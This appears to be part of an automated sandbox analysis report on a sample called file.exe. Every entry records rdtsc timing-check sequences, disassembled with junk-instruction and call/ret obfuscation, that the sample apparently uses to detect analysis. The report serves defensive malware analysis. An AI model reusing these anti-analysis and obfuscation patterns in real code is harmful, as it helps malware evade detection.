Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A077F second address: 9A07CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 4DD7EE60h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F1511CE28h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b add dword ptr [ebp+122D1B1Fh], edx 0x00000031 lea ebx, dword ptr [ebp+124525D2h] 0x00000037 or di, 9750h 0x0000003c push eax 0x0000003d pushad 0x0000003e jc 00007F7F1511CE2Ch 0x00000044 push eax 0x00000045 push edx 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0911 second address: 9A0915 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0915 second address: 9A0976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Fh 0x0000000b popad 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jmp 00007F7F1511CE34h 0x00000015 mov eax, dword ptr [eax] 0x00000017 jg 00007F7F1511CE30h 0x0000001d mov dword ptr [esp+04h], eax 0x00000021 push eax 0x00000022 push edx 0x00000023 push edx 0x00000024 jmp 00007F7F1511CE39h 0x00000029 pop edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0976 second address: 9A097B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A097B second address: 9A0993 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop eax 0x00000008 movzx edx, si 0x0000000b lea ebx, dword ptr [ebp+124525DBh] 0x00000011 xchg eax, ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 push ebx 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0993 second address: 9A0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 9A0999 second address: 9A099D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A09FD second address: 9A0A76 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F7F147AEA57h 0x0000000f nop 0x00000010 cld 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push esi 0x00000016 call 00007F7F147AEA48h 0x0000001b pop esi 0x0000001c mov dword ptr [esp+04h], esi 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc esi 0x00000029 push esi 0x0000002a ret 0x0000002b pop esi 0x0000002c ret 0x0000002d jp 00007F7F147AEA49h 0x00000033 push D75099D8h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007F7F147AEA4Bh 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0B2F second address: 9A0B84 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F7F1511CE2Ch 0x0000000f jo 00007F7F1511CE26h 0x00000015 popad 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jmp 00007F7F1511CE39h 0x0000001f mov eax, dword ptr [eax] 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 pushad 0x00000025 popad 0x00000026 jmp 00007F7F1511CE31h 0x0000002b popad 0x0000002c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0B84 second address: 9A0BAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA52h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F7F147AEA4Bh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9A0BAB second address: 9A0C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F7F1511CE28h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 jmp 00007F7F1511CE2Bh 0x00000029 lea ebx, dword ptr [ebp+124525E6h] 0x0000002f sbb si, E0C2h 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F7F1511CE2Ch 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE59F second address: 9BE5A8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5A8 second address: 9BE5B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F7F1511CE26h 0x0000000a ja 00007F7F1511CE26h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5B9 second address: 9BE5CB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5CB second address: 9BE5D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE5D1 second address: 9BE5D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE74B second address: 9BE74F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE74F second address: 9BE75E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE75E second address: 9BE772 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jp 00007F7F1511CE26h 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE916 second address: 9BE96C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F7F147AEA53h 0x00000010 jp 00007F7F147AEA48h 0x00000016 push edi 0x00000017 pop edi 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c jmp 00007F7F147AEA58h 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BE96C second address: 9BE972 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BED6C second address: 9BED72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BED72 second address: 9BED80 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE28h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BED80 second address: 9BED84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF1AF second address: 9BF1B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B7200 second address: 9B720B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F7F147AEA46h 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9B720B second address: 9B7214 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF322 second address: 9BF33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F7F147AEA55h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF33C second address: 9BF353 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE30h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF353 second address: 9BF360 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF360 second address: 9BF366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF366 second address: 9BF375 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push edi 0x00000009 pop edi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF375 second address: 9BF37F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F7F1511CE26h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9B8 second address: 9BF9BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9BE second address: 9BF9C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9C4 second address: 9BF9C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9C9 second address: 9BF9CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9CF second address: 9BF9ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jmp 00007F7F147AEA55h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BF9ED second address: 9BFA1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jc 00007F7F1511CE26h 0x00000012 jo 00007F7F1511CE26h 0x00000018 popad 0x00000019 jmp 00007F7F1511CE39h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFA1F second address: 9BFA3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA58h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFBB4 second address: 9BFBBA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFE8A second address: 9BFE90 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFE90 second address: 9BFEA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jnp 00007F7F1511CE26h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEA0 second address: 9BFEA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEA6 second address: 9BFEAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEAC second address: 9BFEB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9BFEB2 second address: 9BFEB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C01BE second address: 9C01C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C58C2 second address: 9C58D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F1511CE2Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C7D4C second address: 9C7D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9C8195 second address: 9C819A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC577 second address: 9CC582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC582 second address: 9CC58E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jo 00007F7F1511CE26h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC58E second address: 9CC594 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC720 second address: 9CC728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CC728 second address: 9CC72D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD133 second address: 9CD139 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD208 second address: 9CD20D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD20D second address: 9CD271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007F7F1511CE2Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ecx 0x00000015 jmp 00007F7F1511CE38h 0x0000001a pop ecx 0x0000001b pop eax 0x0000001c call 00007F7F1511CE2Ah 0x00000021 add di, 37CFh 0x00000026 pop edi 0x00000027 push C4C28538h 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F7F1511CE32h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD271 second address: 9CD27B instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD27B second address: 9CD281 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD59E second address: 9CD5A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CD842 second address: 9CD847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDCC4 second address: 9CDCC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CDCC8 second address: 9CDCCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE1B9 second address: 9CE1BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE27A second address: 9CE284 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE284 second address: 9CE289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE289 second address: 9CE2A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a je 00007F7F1511CE30h 0x00000010 jmp 00007F7F1511CE2Ah 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CE749 second address: 9CE759 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 je 00007F7F147AEA4Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF183 second address: 9CF187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF22F second address: 9CF234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9CF234 second address: 9CF24A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F1511CE28h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e jl 00007F7F1511CE2Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D0DA0 second address: 9D0DAA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2243 second address: 9D226C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F7F1511CE31h 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F7F1511CE2Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D1F35 second address: 9D1F39 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D3B second address: 9D2D3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D3F second address: 9D2D45 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D45 second address: 9D2D5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F1511CE36h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D2D5F second address: 9D2DD5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b xor dword ptr [ebp+122D28F6h], ecx 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push eax 0x00000016 call 00007F7F147AEA48h 0x0000001b pop eax 0x0000001c mov dword ptr [esp+04h], eax 0x00000020 add dword ptr [esp+04h], 0000001Bh 0x00000028 inc eax 0x00000029 push eax 0x0000002a ret 0x0000002b pop eax 0x0000002c ret 0x0000002d jmp 00007F7F147AEA51h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007F7F147AEA48h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e xor dword ptr [ebp+122D1CB9h], ebx 0x00000054 push eax 0x00000055 push esi 0x00000056 pushad 0x00000057 push ebx 0x00000058 pop ebx 0x00000059 push eax 0x0000005a push edx 0x0000005b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38D3 second address: 9D38DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38DC second address: 9D38EE instructions: 0x00000000 rdtsc 0x00000002 jg 00007F7F147AEA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38EE second address: 9D38F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38F2 second address: 9D38F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D38F8 second address: 9D397C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F7F1511CE26h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push edx 0x00000012 call 00007F7F1511CE28h 0x00000017 pop edx 0x00000018 mov dword ptr [esp+04h], edx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc edx 0x00000025 push edx 0x00000026 ret 0x00000027 pop edx 0x00000028 ret 0x00000029 pushad 0x0000002a pushad 0x0000002b movzx edx, ax 0x0000002e jmp 00007F7F1511CE2Dh 0x00000033 popad 0x00000034 mov edx, ebx 0x00000036 popad 0x00000037 push 00000000h 0x00000039 mov dword ptr [ebp+122D2C98h], esi 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 call 00007F7F1511CE28h 0x00000049 pop eax 0x0000004a mov dword ptr [esp+04h], eax 0x0000004e add dword ptr [esp+04h], 0000001Bh 0x00000056 inc eax 0x00000057 push eax 0x00000058 ret 0x00000059 pop eax 0x0000005a ret 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e jmp 00007F7F1511CE2Fh 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D397C second address: 9D399A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F7F147AEA54h 0x00000008 jmp 00007F7F147AEA4Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D399A second address: 9D399F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 9D399F second address: 9D39A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
